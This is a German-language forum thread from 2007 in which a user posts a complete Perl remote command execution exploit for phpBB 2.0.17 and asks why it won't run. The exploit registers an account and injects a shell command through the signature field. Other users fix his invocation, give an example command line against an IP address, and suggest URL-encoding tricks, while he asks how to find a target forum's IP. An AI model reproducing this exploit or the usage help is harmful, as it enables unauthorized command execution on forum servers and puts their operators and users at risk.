Hilfe bei Exploit mit Perl

BasHx · 9. Juli 2007

huhu zuerst einmal mein problem ich hab n exploit von ner seite

Code:

#!/usr/bin/perl

# phpBB <= 2.0.17 remote command execution exploit
# need for work: 
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05

use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV < 2) { usage(); }

head();

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

for($i=0;$i<5;$i++)
 {
 $rand .= int(rand(9)); 
 }

$name = 'r57phpBB2017xpl'.$rand;
$password = 'r57phpBB2017xpl'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post(
 $path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',

 Content => [ 
 'username' => $name,
 'email' => $rand.'_bill_gates@microsoft.com',
 'new_password' => $password,
 'password_confirm' => $password,
 'signature' => 'r57:`'.$cmd.'`',
 'viewemail' => '0',
 'hideonline' => '1',
 'notifyreply' => '0',
 'notifypm' => '0',
 'popup_pm' => '0',
 'attachsig' => '0',
 'allowbbcode' => '1',
 'allowhtml' => '1',
 'allowsmilies' => '0',
 'mode' => 'register',
 'agreed' => 'true',
 'coppa' => '0',
 'submit' => 'Submit',
 ],
 );

if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }

$res = $xpl->post(
 $path.'login.php',
 Content => [
 'username' => $name,
 'password' => $password,
 'redirect' => '',
 'login' => 'Log in',
 ],Referer => $path.'login.php');

$res = $xpl->get($path.'profile.php?mode=editprofile');
@content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
for(@content)
 {
 if(/<\/textarea>/) { $p = 0; }
 print $_."\r\n" if $p;
 if(/<textarea name="signature"/){ $p = 1; }
 }
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

sub head()
 {
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC\r\n"; 
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 }
 
sub usage()
 {
 head();
 print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
 print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
 print " <cmd> - Command for execute\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 exit();
 }

# milw0rm.com [2005-12-24]

wenn ich jetzt

cd desktop
und dann beispiel.pl eingebe komm ich in so n menü
wenn ich path angebe bekomm ich zuerst nix dann geb ich nochmal ein und bekomme einen Syntaxfehler.

woran liegt das ?!

Anzeige

Mahjong · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

"so nen Syntaxfehler" ist nicht sehr aussagekräftig

//edit habs mal getestet

{bild-down: http://img258.imageshack.us/img258/3074/82988499gp6.jpg}

HITMAN · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

haste auch ein perl Interpreter installiert ? z.b. activeperl

BasHx · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

ja hab activeperl..
hm bei mir funkt das iwie nich
ich mach z.B path xxx
dann gibt der mir n Syntaxfehler an
muss ich die ip eingeben oder die url ?

Mahjong · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

Schreib uns doch einfach mal wie die Ausgabe aussieht, oder mach am besten nen Screenshot

Ach und bitte mach den Link raus ... sonst kommt das wie ein scheiß hack request rüber, und btw. hab ich kein Bock dir dabei zu helfen irgend ein Forum anzugreifen....

BasHx · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

bei mir sieht das iwie anders aus.. btw hab windoof -.-
was muss ich den genau eingeben wenn ich path xxx eingebe kommt nix mehr .. dann kann ich nur nochwas eingeben..wenn ich dann cmd eintippe kommt iwie befehl nich gefunden oder so

Mahjong · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

Wenn du einfach so nett wärst und die KOMPLETTE Ausgabe posten würdest, kann doch nicht so schwer sein . Wenn du sagst es ist ein Syntax Fehler hat es was mit dem Script zu tun, und um das zu analysieren benötigt man eben den Fehler .

Btw, sollte egal sein welches Betriebsystem

BasHx · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

ahso ok^^ mom kommt gleich #

e/
Download offline!

Mahjong · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

Also so wie ich das sehe liegt der Fehler nicht am Exploit selbst ( es hat nichmal eine Ausgabe für Syntax Error) sondern entweder an deinem Interpreter (ActivePerl) oder du hast das Exploit falsch / nicht vollständig kopiert

Einfach nochmals probieren mit ner neuen Datei

Brainstorm · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

Du hast den Befehl falsch eingegeben !

richtig wäre:

beispiel.pl "IP-Adresse mit /Pfad des entsprechenden spaces" "kommando"

also z.B.

beispiel.pl 91.54.43.46/phpbb/ ls

BasHx · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

danke brainstorm ich versuchs ma
but . wie bekomm ich die ip vom forum heraus ?

e/
okay bis jetzt läuft alles gut.. hab user blabla registred aber der user funkt nicht ? btw password und username

so siehts jetzt aus
Download offline!

eugen · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

dachte das sei per default on - naja musste halt mit ' aka %27 alias %2527 rumspielen

BasHx · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

hä wie meinste das jetzt ?

tHe dUdE · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

Vergiss das Exploit. Die PHPBB-Version ist neuer als die fuer das Exploit...

BasHx · 9. Juli 2007

AW: Hilfe bei Exploit mit Perl

kk ich close hier ma..

Nützliche Suchen

Hilfe bei Exploit mit Perl

Videos zum Themenbereich